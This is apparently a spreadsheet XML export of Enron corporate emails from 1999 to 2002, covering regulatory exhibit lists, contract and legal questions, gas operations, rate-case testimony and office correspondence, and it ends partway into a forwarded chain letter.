&gt; 'karpjos@sf.whitecase.com'; 'jleslie@luce.com'; 'kmccrea@sablaw.com';_x000D_
&gt; 'jmpa@dynegy.com'; 'rmp@cpuc.ca.gov'; 'porterdk@sce.com';_x000D_
&gt; 'RochmanM@cubjpa.org'; 'RochmanM@spurr.org'; 'susan.scott@enron.com';_x000D_
&gt; Betonte, Robert - TP2RSB; Brill, Thomas R.; Follett, B. David - TPDBF;_x000D_
&gt; Harrigan, James P. - TP1JPH; Hay, James E.; Lorenz, Lad - TPLPL; McVay,_x000D_
&gt; Nancy W - TPNWM; Morrow, Rick - TP3RMM; Purves, Ralph A.; Sakarias, Wayne_x000D_
&gt; P.; Schavrien, Lee; Sullivan, Glen J.; Surak, Thomas M. - TP1TMS; Teeter,_x000D_
&gt; James S.; Van Lierop, Jan - TP2JXV; Watson, Steven - TP2SAW; Wright,_x000D_
&gt; Gillian - TP1GXW; Barker, David - TPDTB; 'How-Downing, Lindsey'; 'Jun,_x000D_
&gt; Christine'; 'Gileau, Pat'; 'Khoury, Dexter'; 'ack@aelaw.com'; Suwara, J.-_x000D_
&gt; TPJUS; Wright, Gillian - TP1GXW; Reed, William_x000D_
&gt; Subject: RE:  Exhibit List_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;   For those of you trying to keep track of the exhibit lists_x000D_
&gt; in this case, here is the most recent update of the exhibit list for the_x000D_
&gt; Comprehensive Settlement Agreement.  For those preparing rebuttal, please_x000D_
&gt; identify your testimony as such for consistency purposes.  John_x000D_
&gt; Burkholder, who was originally identified as filing exhibit 19, will not_x000D_
&gt; be filing rebuttal.  Eric Nelson, who will be rebutting the testimony of_x000D_
&gt; Powerspring, will file as exhibit 19._x000D_
&gt;_x000D_
&gt;   FILED EXHIBITS_x000D_
&gt;   Exhibit 1   Comprehensive Settlement Document_x000D_
&gt;   Exhibit 2   Lad Lorenz Testimony_x000D_
&gt;   Exhibit 3   Eric Nelson Testimony_x000D_
&gt;   Exhibit 4   Mark Pocta Testimony_x000D_
&gt;   Exhibit 5   Tom Beach Testimony_x000D_
&gt;   Exhibit 6   Jeff Dasovich Testimony_x000D_
&gt;   Exhibit 7   Rick Counihan Testimony_x000D_
&gt;   Exhibit 8   John Burkholder Testimony_x000D_
&gt;   Exhibit 9   Paul Amirault Testimony_x000D_
&gt;   Exhibit 10  Jeanne Zaiontz Testimony_x000D_
&gt;   Exhibit 11  Paul McKelvey Testimony_x000D_
&gt;   Exhibit 12  Jeff Fawcett Testimony_x000D_
&gt;   Exhibit 13  Errata to Comprehensive Settlement Document_x000D_
&gt;_x000D_
&gt;   NEW EXHIBITS_x000D_
&gt;   Exhibit 14  Rebuttal Testimony of Lad Lorenz_x000D_
&gt;   Exhibit 15  Rebuttal Testimony of Jeff Dasovich_x000D_
&gt;   Exhibit 16  Rebuttal Testimony of Paul Amirault_x000D_
&gt;   Exhibit 17  Rebuttal Testimony of Jeff Fawcett_x000D_
&gt;   Exhibit 18  Rebuttal Testimony of Tom Beach_x000D_
&gt;   Exhibit 19  Rebuttal Testimony of Eric Nelson_x000D_
&gt;   Exhibit 20  Rebuttal Testimony of Rick Counihan_x000D_
&gt;_x000D_
&gt; </t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 04:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'edith-kelly@reliantenergy.com'})</t>
  </si>
  <si>
    <t>frozenset({'dana.davis@enron.com', 'cmontgomery@kmg.com'})</t>
  </si>
  <si>
    <t>MOP</t>
  </si>
  <si>
    <t>Greeting My Sisters In Christ,_x000D_
_x000D_
I was just touching basis with the both of you as frontliners to say that_x000D_
we are blessed and highly favored in the eyes of  God. On last night, the_x000D_
group participated in a three-way and it was a blessing and it was agreed_x000D_
on last night that we too would be participating in the fast on Wednesday_x000D_
as well._x000D_
_x000D_
We all agreed to do the fast with water only, because we know that there_x000D_
are different kinds of fast and I wasn't sure what others were doing, but_x000D_
my feeling is that whatever we do as a unit and as long as we are doing it_x000D_
to the Glory and Honor of God, then He honors what's in our hearts._x000D_
_x000D_
I believe that this is only the beginning of change and that God is truly_x000D_
doing a new thing in the saints of God. The fast was a blessing for me on_x000D_
today. I got up this morning with a spirit of expectation, not knowing what_x000D_
to expect, but knowing that God was doing something powerful in the spirit_x000D_
realm._x000D_
_x000D_
I believe that as we continue to walk in unity, keep our focus, commit our_x000D_
work unto Him, that God will establish our thoughts and He will complete_x000D_
that which He has started in us....A good work._x000D_
_x000D_
Be blessed :-)_x000D_
Edith</t>
  </si>
  <si>
    <t>Wed, 26 Jul 2000 09:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: ISDA Definitions</t>
  </si>
  <si>
    <t xml:space="preserve">Sara, _x000D_
_x000D_
This issue is beyond my area of knowledge.  I'm sure Tana can answer those _x000D_
questions._x000D_
_x000D_
tm_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Sara Shackleton_x000D_
	07/26/2000 03:22 PM_x000D_
		 _x000D_
		 To: Taffy Milligan/HOU/ECT@ECT, Tana Jones/HOU/ECT@ECT_x000D_
		 cc: Mary Cook/HOU/ECT@ECT_x000D_
		 Subject: ISDA Definitions_x000D_
_x000D_
Per my earlier email and the one below, could you please let us know about _x000D_
the 2000 Defintions?  Thanks.  Sara_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 07/26/2000 03:20 PM -----_x000D_
_x000D_
	Mary Cook_x000D_
	07/26/2000 01:31 PM_x000D_
		 _x000D_
		 To: Sara Shackleton/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: ISDA Definitions_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
_x000D_
I got a copy of 2000 Definitions Annex via distribution today.  However, I _x000D_
did not know of nor do I have the 2000 Definitions, which apparently _x000D_
restated/conformed the 1991/1998 basic ISDA definitions.  Our Master still _x000D_
refs 1991, as amended etc., so it probably does pick up the 2000 issuance by _x000D_
ISDA.  Do you have the 2000?  Do we need to order?  Should we consider _x000D_
revising the master agreement in respect of the definition incorporation _x000D_
language?  Give me a call.   Mary  Thanks._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 4 Jan 2001 08:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'joe.witherspoon@enron.com'})</t>
  </si>
  <si>
    <t>Hot Line Request</t>
  </si>
  <si>
    <t>Joe, we would like to make an urgent request to have one of our staff persons _x000D_
added to our hotline number 18000.  We have discussed this request on _x000D_
numerous occasions, but have not been successful in any attempt._x000D_
_x000D_
Would you please, at this time, please arrange to have Michelle Lokay's _x000D_
extension, 57932, roll over to the hotline number, 18000._x000D_
_x000D_
When we spoke, you assured me that this would be handled.  Please call me on _x000D_
ext. 35849 if you have any questions regarding this request._x000D_
_x000D_
Again, we will need this handled today._x000D_
_x000D_
Thanks in advance for your assistance,_x000D_
_x000D_
adr</t>
  </si>
  <si>
    <t>Tue, 28 Mar 2000 03:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CES Bug Tetco capacity</t>
  </si>
  <si>
    <t>I executed the Bug capacity for April.  Offer #16219, vol=103,  k#892865, _x000D_
deal numbers 229304/229314_x000D_
_x000D_
I set it up under MarketEast and East with Market East as primary.</t>
  </si>
  <si>
    <t>Mon, 31 Jan 2000 01:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'richard.sanders@enron.com', 'mark.taylor@enron.com', 'sara.shackleton@enron.com', 'carol.clair@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">I think this clause is a worth a try.  _x000D_
_x000D_
Just one nitpicky thing - I would have thought the correct word would be _x000D_
"parol" - not "parole"._x000D_
_x000D_
S_x000D_
---------------------- Forwarded by Shari Stack/HOU/ECT on 01/31/2000 09:36 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Sara Shackleton_x000D_
01/31/2000 09:30 AM_x000D_
To: Carol St Clair/HOU/ECT@ECT, Shari Stack/HOU/ECT@ECT, Mark _x000D_
Taylor/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Admissability of tapes into evidence_x000D_
_x000D_
Could this be an alternative to our recording issue?_x000D_
---------------------- Forwarded by Sara Shackleton/HOU/ECT on 01/31/2000 _x000D_
08:53 AM ---------------------------_x000D_
_x000D_
_x000D_
Richard B Sanders_x000D_
01/31/2000 04:59 AM_x000D_
To: Sara Shackleton/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Admissability of tapes into evidence  _x000D_
_x000D_
In theory, there may be some jurisdictions that do not allow tapes to be _x000D_
admissable because of issues other than relevance--such as authenticity. It _x000D_
is hard to know the Evidence Rules of every jurisdiction. I would suggest the _x000D_
following language:_x000D_
_x000D_
The parties to this Agreement agree that any such recording are admissable in _x000D_
any legal proceeding for any matters relevant to the Agreement, except for _x000D_
those recordings that violate the Parole Evidence Rule of the applicable _x000D_
jurisdiction._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 12:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>heads up</t>
  </si>
  <si>
    <t>The London Credit Trading team ( Commercial and nonCommercial ) are currently _x000D_
investigating some transactions in the Houston Debt trading book that are _x000D_
inappropriately marked ( in fact one is a complex trade that appears to be  _x000D_
'accrual accounted for' since April ). Bryan Seyfried is in Houston and is _x000D_
keen to understand the facts of any potential 'process failure'  - we are _x000D_
liaising with him._x000D_
_x000D_
The potential write off is, I understand, of the order of $5mm, but I am keen _x000D_
to understand the control issues around any 'process failure'_x000D_
_x000D_
Clearly we need to determine the facts but I thought you should know about _x000D_
some noise out there !_x000D_
_x000D_
Will revert later  tomorrow_x000D_
_x000D_
Mike</t>
  </si>
  <si>
    <t>Tue, 8 Jan 2002 07:10:23 -0800 (PST)</t>
  </si>
  <si>
    <t>Request Closed: Access Request for darron.c.giron@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">The request has been completed with all resources requested either completed or rejected. You can view the details of the  request by clicking http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000080553&amp;Page=MyReq._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Jul 2000 09:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'susan.scott@enron.com', 'bambi.heckerman@enron.com', 'toby.kuehl@enron.com', 'georgi.landau@enron.com', 'janet.place@enron.com', 'shelley.corman@enron.com', 'frazier.king@enron.com', 'geneva.holland@enron.com', 'dorothy.mccoppin@enron.com', 'nancy.bastida@enron.com', 'julia.white@enron.com', 'patricia.steele@enron.com', 'dari.dornan@enron.com', 'sheila.nacey@enron.com', 'drew.fossum@enron.com', 'kim.perez@enron.com', 'bob.hall@enron.com', 'dennis.lee@enron.com'})</t>
  </si>
  <si>
    <t>MARKETING AFFILIATE RULE: Standard L Notice No. 20</t>
  </si>
  <si>
    <t xml:space="preserve">Please open and read the attached "Mkt Aff Memo 20", effective July 13, 2000, _x000D_
which gives you notice of a new Potential Marketing Affiliate:  DJ Oil &amp; Gas _x000D_
LLC._x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Dec 2001 13:04:17 -0800 (PST)</t>
  </si>
  <si>
    <t>Producers for November - Powder River</t>
  </si>
  <si>
    <t xml:space="preserve">Megan,_x000D_
Here are the producers for November for the Powder River system.  I don't have Lost Creek yet - hopefully before you leave._x000D_
_x000D_
Please call me if you see any problems._x000D_
_x000D_
There will be no sales invoice this month for Crestone and I've told this to Scott Dozier._x000D_
_x000D_
I will get the gathering to Gloria tomorrow._x000D_
_x000D_
Thanks again,_x000D_
_x000D_
Theresa_x000D_
_x000D_
(P.S. - you'll have to give me your new # so we can keep in touch)_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 8 Apr 1999 17:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Mike_x000D_
We completed decontamination of the inlet filter at the selexol plant today. _x000D_
It was dirty but _x000D_
no liquid. There was some dried sludge in the bottom of the vessel and the _x000D_
filters were _x000D_
extremely dirty. We plan to do both of the filters on the discharge side _x000D_
tomorrow.I got a phone _x000D_
messsage from Jeff and he hasn't heard anything from PGE since the letter was _x000D_
sent . We will _x000D_
plan to bypass and clean the filter on the west side of the river, last one _x000D_
on our system Saturday_x000D_
unless we hear something different tomorrow. We will notify the PGE operators _x000D_
of their plant _x000D_
tomorrow of our plans.If anyone needs to contact me my pager number is _x000D_
1-800-921-9564 and office_x000D_
phone number is 505-260-4003. Leave a message on the office phone and it will _x000D_
automatically_x000D_
page me. I'll give everyone an update late tomorrow. We should have the hot _x000D_
tap valves on location _x000D_
tomorrow for the selexol injection. We plan to install the valves as soon as _x000D_
they arrive._x000D_
_x000D_
Thanks RJ_x000D_
_x000D_
By the way Bisti came on line today and they plan to run it tonight and be _x000D_
back on location to _x000D_
check on the unit tomorrow.</t>
  </si>
  <si>
    <t>Sat, 21 Apr 2001 06:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Summary of Harry's testimony and recommendation for briefing</t>
  </si>
  <si>
    <t>(I had type of bunch of this and them my computer died, so I have to rewrit=_x000D_
e=20_x000D_
it - UGH)_x000D_
Harry's testimony was brilliant, and here is a summary. =20_x000D_
Harry explained our proposal and how it achieves goals of equity and=20_x000D_
conservation  (equity because all customers sacrifice equally and=20_x000D_
conservation because there will be reductions in usage).  The other proposa=_x000D_
ls=20_x000D_
in the case arbitrarily allocate costs to peak, whereas our proposal will=_x000D_
=20_x000D_
have customers reacting to price signals, and if affords flexibility.  The=_x000D_
=20_x000D_
Hearing Examiner (HE) asked what services EES provides, and whether our=20_x000D_
customers were DA customers (she was trying to get to our real interest in=_x000D_
=20_x000D_
this case, which the PG&amp;E attorney helped with later)._x000D_
_x000D_
Slocum (PG&amp;E) did not understand that our proposal was only for TOU=20_x000D_
customerrs and asked a lot of questions about implementation problems that=_x000D_
=20_x000D_
were based on implementation for all classes.(Questions like moving usage=_x000D_
=20_x000D_
data to billing system, 30% turnover in customers, lack of data for new=20_x000D_
customers, lack of metering).  Harry acknowledged that the peak defined by =_x000D_
DJ=20_x000D_
might not match the rate class peak definition and that some adjustments=20_x000D_
might have to be made.  Slocum noted that TOU meters do not show hourly=20_x000D_
usage, and that hourly interval meters would need to be installed to make o=_x000D_
ur=20_x000D_
proposal work.  Harry answered that we recognize that our proposal would ta=_x000D_
ke=20_x000D_
time, but that we need to move to this and that customers need price signal=_x000D_
s=20_x000D_
this summer. =20_x000D_
_x000D_
Our proposal is only for TOU customers, and for those for whom it cannot be=_x000D_
=20_x000D_
implemented, an equal 3 cents per kwh is appropriate.  Harry noted that we=_x000D_
=20_x000D_
have not taken a position on the proposal that should be adopted for other=_x000D_
=20_x000D_
customer classes yet. =20_x000D_
_x000D_
He was asked where the 87% came from, ands he pointed out the derivation th=_x000D_
at=20_x000D_
was in his testimony based on predicted market price and cost of retained=_x000D_
=20_x000D_
generation.  Two assumptions were made:  a $300 average market price and=20_x000D_
customers have same billing determinants for 2001 in combination with marke=_x000D_
t=20_x000D_
price assumptions and existing generation rate to get the revenue=20_x000D_
requirements.  It is possible that the price may not be $300 and our revenu=_x000D_
e=20_x000D_
requirements may be off, but this is true with every other proposal  as=20_x000D_
well.  The basis for the $300 is the COB and PV Nymex contracts. =20_x000D_
_x000D_
If our proposal cannot be implemented this summer, the 3 cent charge sends =_x000D_
an=20_x000D_
adequate and strong signal to consumers across the board.  When asked wheth=_x000D_
er=20_x000D_
PG&amp;E would have to program a different method for TOU customers if Enron=01=_x000D_
,s=20_x000D_
proposal is adopted, Harry answered that they already have to program a=20_x000D_
different method for TOU customers under existing rates.  PG&amp;E asked how th=_x000D_
e=20_x000D_
decremental reward program would be funded.  Harry noted that it could be=_x000D_
=20_x000D_
funded through the ISO, DWR, utility bonding.  The PG&amp;E attorney noted that=_x000D_
=20_x000D_
the utilities have been downgraded to junk bond status and couldn=01,t issu=_x000D_
e=20_x000D_
bonds.  Funding is an issue._x000D_
_x000D_
Then PG&amp;E asked if we left the market on 2/1/01.  Harry answered no.  We=20_x000D_
simply began sourcing power from the utility, but our contracts are still i=_x000D_
n=20_x000D_
effect.  She asked Harry what kind of customers we had, were they mostly=20_x000D_
large TOU customers?  Do they have interval meters?  She asked if we were o=_x000D_
n=20_x000D_
the hook for the difference between the bundled rate and the contract rate.=_x000D_
 =20_x000D_
Harry answered that he didn=01,t know on balance what impact our proposal w=_x000D_
ould=20_x000D_
have on our TOU customers.   Our proposal helps to foster the goals and=20_x000D_
pursue the incentives to get to the needed solutions in CA.  He also noted=_x000D_
=20_x000D_
that all parties to this proceeding were proposing methodologies that were=_x000D_
=20_x000D_
most beneficial to them._x000D_
_x000D_
SC&amp;E asked a bunch of questions about recovery of T&amp;D costs, if the 87%=20_x000D_
target were used.  Harry answered that any undercollections that may result=_x000D_
=20_x000D_
(and this could be true under any of the proposals) could be dealt with it =_x000D_
a=20_x000D_
rate case filing.  They also talked about how the customer would know the=_x000D_
=20_x000D_
daily prices, would the utility be obligated to make that info available?  =_x000D_
HK=20_x000D_
answered that it is forecast a day ahead and is publicly available.  Then h=_x000D_
e=20_x000D_
was asked whether Enron would fund the decremental reward program.  Harry=_x000D_
=20_x000D_
noted that we might under the right conditions, but this was outside his=20_x000D_
expertise._x000D_
_x000D_
ORA asked about weather normalization, again under the misapprehension that=_x000D_
=20_x000D_
our proposal applied to weather sensitive smaller customers.  Harry also to=_x000D_
ld=20_x000D_
him that the indices we proposed were very liquid.  He also handled questio=_x000D_
ns=20_x000D_
on whether a different average price would yield a different break point, a=_x000D_
nd=20_x000D_
we need to provide calculations that show an average price of $200 and $500=_x000D_
. =20_x000D_
_x000D_
The Hearing Examiner then asked for Enron=01,s estimates of summer on peak =_x000D_
and=20_x000D_
off peak prices, and ruled that we must supply that info by COB Monday, ove=_x000D_
r=20_x000D_
counsel=01,s objections._x000D_
_x000D_
In general, I think there was a lot of confusion about our proposal (not=20_x000D_
understanding that it was only directed to one type of customer).  There is=_x000D_
=20_x000D_
also a lot of distrust of Enron and I would add dislike as well.  I do not=_x000D_
=20_x000D_
think the HE will consider any of our proposals seriously and in fact our=_x000D_
=20_x000D_
support on some of the other proposals could be the kiss of death.  I would=_x000D_
=20_x000D_
keep our brief very short and very limited,  as we can weigh in on support =_x000D_
of=20_x000D_
the other A and RD methodologies after the HE issues her recommended=20_x000D_
decision.  In fact, we might even like a proposal she recommends.</t>
  </si>
  <si>
    <t>Sun, 10 Dec 2000 05:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'smiller@bracepatt.com'})</t>
  </si>
  <si>
    <t>frozenset({'vwesterhaus@shb.com'})</t>
  </si>
  <si>
    <t>AMPS Assignment</t>
  </si>
  <si>
    <t>Attached is a marked version of the Assignment Agreement with our initial _x000D_
comments.  In addition to the comments marked, we also have a few other _x000D_
questions._x000D_
_x000D_
Although we do not object to it being mentioned twice, why is the lease _x000D_
assigned pursuant to this Assignment Agreement when there is also a separate _x000D_
lease assignment agreement?_x000D_
_x000D_
How was the employment of the persons listed on Exhibit A to the Assignment _x000D_
Agreemement effected?  Were they terminated or did they resign?  Is there any _x000D_
documentation regarding this?_x000D_
_x000D_
We may have further comments after review by Enron and our labor attorney.  _x000D_
Please call Cle at (713) 221-1314 or me at (713) 221-1131 with your comments._x000D_
_x000D_
Thanks._x000D_
_x000D_
Scott L. Miller_x000D_
Bracewell &amp; Patterson, L.L.P._x000D_
Phone (713) 221-1131_x000D_
Fax (713) 222-3242_x000D_
email:  smiller@bracepatt.com_x000D_
_x000D_
 - Redline AMPS Assignment Agreement.doc</t>
  </si>
  <si>
    <t>Thu, 3 May 2001 02:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'joan.quick@enron.com', 'susan.smith@enron.com', 'marilyn.colbert@enron.com', 'michael.morris@enron.com', 'sylvia.campos@enron.com', 'faye.ellis@enron.com', 'genia.fitzgerald@enron.com', 'kelly.lombardi@enron.com', 'patrice.mims@enron.com', 'brad.coleman@enron.com', 'kelly.carrington@enron.com', 'sylvia.pollan@enron.com', 'connie.sutton@enron.com', 'steve.watson@enron.com', 'lisa.carver@enron.com', 'elizabeth.hernandez@enron.com', 'larry.hunter@enron.com', 'edward.terry@enron.com', 'dianne.seib@enron.com', 'melissa.graves@enron.com', 'christa.winfrey@enron.com', 'kenneth.harmon@enron.com', 'bryce.baxter@enron.com', 'shonnie.daniel@enron.com', 'stephanie.panus@enron.com', 'jeff.richter@enron.com', 'lane.alexander@enron.com', 'anita.patton@enron.com', 'elsa.villarreal@enron.com', 'colleen.sullivan@enron.com', 'anthony.campos@enron.com', 'vance.taylor@enron.com', 'bill.hare@enron.com', 'irene.flynn@enron.com', 'jason.moore@enron.com', 'victor.lamadrid@enron.com', 'debbie.brackett@enron.com', 'amelia.alland@enron.com', 'errol.mclaughlin@enron.com', 'mark.thorne@enron.com', 'richard.miley@enron.com', 'samuel.schott@enron.com', 'mary.smith@enron.com', 'laura.vargas@enron.com', 'oscar.rivera@enron.com', 'lisa.cousino@enron.com', 'kimberlee.bennick@enron.com', 'donald.reinhardt@enron.com', 'boyd.coble@enron.com', 'brenda.herod@enron.com', 'scotty.gilbert@enron.com', 'clem.cernosek@enron.com', 'cregg.lancaster@enron.com', 'jennifer.oliver@enron.com', 'john.powell@enron.com', 'bernice.rodriguez@enron.com', 'product.houston@enron.com', 'susan.elledge@enron.com', 'kate.symes@enron.com', 'james.scribner@enron.com', 'ellen.wallumrod@enron.com', 'kathryn.bussell@enron.com', 'peggy.hedstrom@enron.com', 'andrew.lewis@enron.com', 'richard.mckeel@enron.com', 'chris.mallory@enron.com', 'edward.baughman@enron.com', 'daren.farmer@enron.com', 'geoff.storey@enron.com', 'lauri.allen@enron.com', 'shemeika.landry@enron.com', 'kim.theriot@enron.com', 'russell.diamond@enron.com', 'nanette.kettler@enron.com', 'jefferson.sorenson@enron.com', 'bridgette.anderson@enron.com', 'rahil.jafry@enron.com', 'tammie.huthmacher@enron.com', 'lisa.valderrama@enron.com', "romeo.d'souza@enron.com", 'sanjeev.gupta@enron.com', 'scott.lytle@enron.com', 'cheryl.dawes@enron.com', 'carrie.southard@enron.com', 'marilyn.schoppe@enron.com', 'gary.lamphier@enron.com', 'enron.facilities@enron.com', 'walter.guidroz@enron.com', 'willie.stewart@enron.com', 'scott.mills@enron.com', 'john.nowlan@enron.com', 'shawna.flynn@enron.com', 'veronica.espinoza@enron.com', 'marlene.hilliard@enron.com', 'karen.lambert@enron.com', 'george.weissman@enron.com', 'kori.loibl@enron.com', 'ralph.douglas@enron.com', 'sony.wilson@enron.com', 'enron.counterparty@enron.com', 'mike.croucher@enron.com', 'tom.moore@enron.com', 'carlos.rodriguez@enron.com', 'cheryl.dudley@enron.com', 'rhonda.denton@enron.com', 'stacey.white@enron.com', 'linda.bryan@enron.com', 'claire.viejou@enron.com', 'hoong.foon@enron.com', 'andrea.guillen@enron.com', 'ruby.kyser@enron.com', 'sherry.dawson@enron.com', 'jim.little@enron.com', 'glenda.mitchell@enron.com', 'stacy.dickson@enron.com', 'elsie.lew@enron.com', 'julie.meyers@enron.com', 'carolyn.gilley@enron.com', 'robert.cotten@enron.com', 'randall.gay@enron.com', 'jenny.latham@enron.com', 'cary.carrabine@enron.com', 'phillip.platter@enron.com', 'nathan.hlavaty@enron.com', 'debra.perlingiere@enron.com', 'katherine.kelly@enron.com', 'monica.lande@enron.com', 'amita.gosalia@enron.com', 'philippe.travis@enron.com', 'karin.williams@enron.com', 'michael.eiben@enron.com', 'colette.weinreich@enron.com', 'liz.hillman@enron.com', 'hillary.mack@enron.com', 'rudwell.johnson@enron.com', 'tracy.ngo@enron.com', 'd.hall@enron.com', 'jeremy.morris@enron.com', 'stacie.guidry@enron.com', 'anne.bike@enron.com', 'veronica.thompson@enron.com', 'nidia.mendoza@enron.com', 'brad.schneider@enron.com', 'dale.newberger@enron.com', 'darren.vanek@enron.com', 'b.palmer@enron.com', 'david.hardy@enron.com', 'susan.trevino@enron.com', 'matilda.machado@enron.com', 'jeremy.wong@enron.com', 'sam.round@enron.com', 'diane.ellstrom@enron.com', 'regina.perkins@enron.com', 'jim.homco@enron.com', 'laurel.adams@enron.com', 'brant.reves@enron.com', 'suzy.robey@enron.com', 'jason.williams@enron.com', 'john.swinney@enron.com', 'sharon.gonzales@enron.com', 'michelle.laurant@enron.com', 'rita.wynne@enron.com', 'michele.small@enron.com', 'donna.consemiu@enron.com', 'arfan.aziz@enron.com', 'bruce.mills@enron.com', 'cindy.horn@enron.com', 'spencer.teel@enron.com', 'cathy.harris@enron.com', 'cyndie.balfour-flanagan@enron.com', 'troy.klussmann@enron.com', 'lynn.shivers@enron.com', 'tana.jones@enron.com', 'debbie.nicholls@enron.com', 'stacey.richardson@enron.com', 'winston.goodbody@enron.com', "o'neal.winfree@enron.com", 'jennifer.blay@enron.com', 'leslie.reeves@enron.com', 'bob.bowen@enron.com', 'bob.hall@enron.com'})</t>
  </si>
  <si>
    <t>Name Overlays 0503</t>
  </si>
  <si>
    <t>The attached name changes were made in the Counterparty system last night, _x000D_
May 3.  I am unable to attach the regular report to an email message because _x000D_
of it's size.  I am working to remedy that situation, and I will notify you _x000D_
once it has been resolved._x000D_
_x000D_
Short name changes will be coordinated with ERMS IT tomorrow, May 4._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Please call me with any questions or concerns._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Cheryl x33103</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 10:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bill.iii@enron.com', 'kathryn.sheppard@enron.com'})</t>
  </si>
  <si>
    <t>Re: itinerary for mark guzman 25mar travel</t>
  </si>
  <si>
    <t>Bill, FYI.  You have both David Porter and me working on that day shift.  _x000D_
Either we need to let the night shift know that they need to come in an hour _x000D_
and a half early, put someone else on that day shift, or change the _x000D_
itenerary.  Let me know when you have this resolved.  Thank you for your _x000D_
attention to this matter.</t>
  </si>
  <si>
    <t>Thu, 6 Apr 2000 09:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'regina.blackshear@enron.com', 'leslie.smith@enron.com', 'eve.puckett@enron.com', 'yvonne.acosta@enron.com', 'suhernan@llgm.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Judy Hernandez/HOU/ECT on 04/06/2000 _x000D_
04:34 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Maria Sandoval                           04/06/2000 01:36 PM_x000D_
	_x000D_
_x000D_
To: Andrea R Guillen/HOU/ECT@ECT, Phenicia Olivier/HOU/ECT@ECT, Bernice _x000D_
Rodriguez/HOU/ECT@ECT, Melissa Rodriguez/HOU/ECT@ECT, Cassandra S _x000D_
Dutton/HOU/ECT@ECT, Lorraine Becker/HOU/ECT@ECT, Angela Henn/HOU/ECT@ECT, _x000D_
Melba Lozano/HOU/ECT@ECT, Chantelle Villanueva/HOU/ECT@ECT, _x000D_
patty.soria@halliburton.com, elizabeth.gutierrez@eott.com, Judy _x000D_
Hernandez/HOU/ECT@ECT, Elizabeth Soto/HOU/ECT@ECT, amolina@unifirst.com, _x000D_
apena26@hotmail.com, Pamela Sonnier/HOU/ECT@ECT, Brenda _x000D_
Barreda/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Yolanda Pena/Corp/Enron@Enron_x000D_
cc:  _x000D_
Subject: FW: [Fwd: good story]_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Maria Sandoval/HOU/ECT on 04/06/2000 _x000D_
02:35 PM ---------------------------_x000D_
From: Brenda Barreda@ENRON_DEVELOPMENT on 04/06/2000 12:06 PM_x000D_
To: MY BUDDIES, Iracema Hernandez/Corp/Enron@ENRON_x000D_
cc:  _x000D_
Subject: FW: [Fwd: good story]_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Brenda Barreda/ENRON_DEVELOPMENT on _x000D_
04/06/2000 01:05 PM ---------------------------_x000D_
   _x000D_
	Enron Engineering &amp; Construction Company_x000D_
	From:  Definia Richardson                           04/06/2000 01:02 PM_x000D_
	_x000D_
_x000D_
To: Brenda Barreda/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: FW: [Fwd: good story]_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Definia Richardson/ENRON_DEVELOPMENT on _x000D_
04/06/2000 01:02 PM ---------------------------_x000D_
_x000D_
_x000D_
"Richardson, Anthony AJ SHCAP" &lt;AR200243@MSXSOC.SHELL.COM&gt; on 04/06/2000 _x000D_
11:16:20 AM_x000D_
To: "'Definia.Richardson@enron.com'" &lt;Definia.Richardson@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: FW: [Fwd: good story]_x000D_
_x000D_
_x000D_
&gt;  &gt;        READ THIS.  LET IT REALLY SINK IN._x000D_
&gt;  &gt;        THEN CHOOSE HOW YOU START YOUR DAY TOMORROW._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Michael is the kind of guy you love to hate.  He is always in_x000D_
&gt; a good_x000D_
&gt;  &gt;      mood and always has something positive to say: When someone_x000D_
&gt; would_x000D_
&gt;  &gt; ask  him  how he was doing, he would reply, "if I were any better,_x000D_
&gt; I would_x000D_
&gt;  &gt; be  twins!"_x000D_
&gt;  &gt;      He was a natural motivator._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      If an employee was having a bad day, Michael was there_x000D_
&gt; telling the_x000D_
&gt;  &gt;      employee how to look on the positive side of the situation._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Seeing this style really made me curious, so one day I went_x000D_
&gt; up to_x000D_
